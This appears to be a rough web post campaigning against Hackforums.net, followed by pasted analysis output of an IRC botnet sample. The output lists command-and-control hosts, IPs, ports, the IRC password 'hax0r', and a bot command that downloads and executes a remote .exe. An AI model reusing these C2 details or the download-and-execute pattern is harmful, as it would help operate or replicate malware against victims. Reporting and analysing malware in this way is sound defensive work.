Hackforums.net Investigation


We are working to get Hackforums.net shut down. We feel strongly that it a website which has an undue influence on young people as well as promoting illegal computer activities such as hacking, virus spreading, manipulation of online financial services etc.

I'm not certain of what your criteria if for judging a site to be 'positive for malware'. I know that is not an easy threat to withstand and I don't blame this site for exercising caution and withdrawing the 'positive' for malware decision.

Hackforums.net - "Infecting one another with malware."


We are reporting this site for illegal activitie and it should be closed as soon as posible!

Legal internet law will clean all illegal activities and we will help realise it!

[IT Security Team]

ashland.aboutkiddies.com(irc botnet hosted in United States New York Webair Internet Development Company Inc)

Remote Host Port Number
209.200.50.75 3800 PASS hax0r
213.251.170.52 80
91.200.241.40 80

* The data identified by the following URLs was then requested from the remote web server:
o http://api.wipmania.com/
o http://91.200.241.40/dq.exe


PRIVMSG #dpi :[d="http://91.200.241.40/dq.exe" s="23552 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\1.tmp" - Download retries: 0


PASS hax0r..KCIK
00000010 | 206E 7B55 537C 5850 617D 6D69 696D 6567 | n{US|XPa}miimeg
00000020 | 740D 0A52 5353 5220 6D69 696D 6567 7420 | t..RSSR miimegt
00000030 | 3020 3020 3A6D 6969 6D65 6774 0D0A 5345 | 0 0 :miimegt..SE
00000040 | 4E44 2023 6E67 206E 6730 300D 0A | ND #ng ng00..

hosting infos:
http://whois.domaintools.com/209.200.50.75